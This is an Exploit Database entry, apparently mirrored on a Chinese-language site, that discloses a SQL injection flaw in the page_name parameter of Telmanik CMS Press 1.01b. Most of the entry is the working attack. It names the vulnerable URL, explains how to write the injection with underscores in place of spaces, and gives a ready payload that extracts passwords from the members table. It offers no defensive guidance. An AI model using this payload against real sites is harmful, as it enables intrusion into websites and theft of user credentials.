Telmanik CMS Press 1.01b – ‘pages.php?page_name’ SQL Injection

• Exploit Database
• 128 阅读

• 作者： Anarchy Angel
  日期： 2013-08-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/27281/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27

  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [x] Type: SQL Injection [x] Vendor: www.telmanik.com [x] Script Name: Telmanik CMS Press [x] Script Version: 1.01b [x] Script DL: http://www.telmanik.com/download/Telmanik_CMS_Press/1.01_beta/telmanik_cms_press_v1.01_beta.zip [x] Author: Anarchy Angel [x] Mail : anarchy[at]dc414[dot]org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   Exploit:   http://site.org/themes/pages.php?page_name=[SQLi]   you have to formate you injection like so: union_select_row_from_table Replacing spaces with �_�.   Ex:   http://site.org/themes/pages.php?page_name=union_select_password_from_members   This is a special DefCon 21 kick off from me! See ya there [image: ;)]   Special Tnx : dc414, lun0s, proge, sToRm, progenic, gny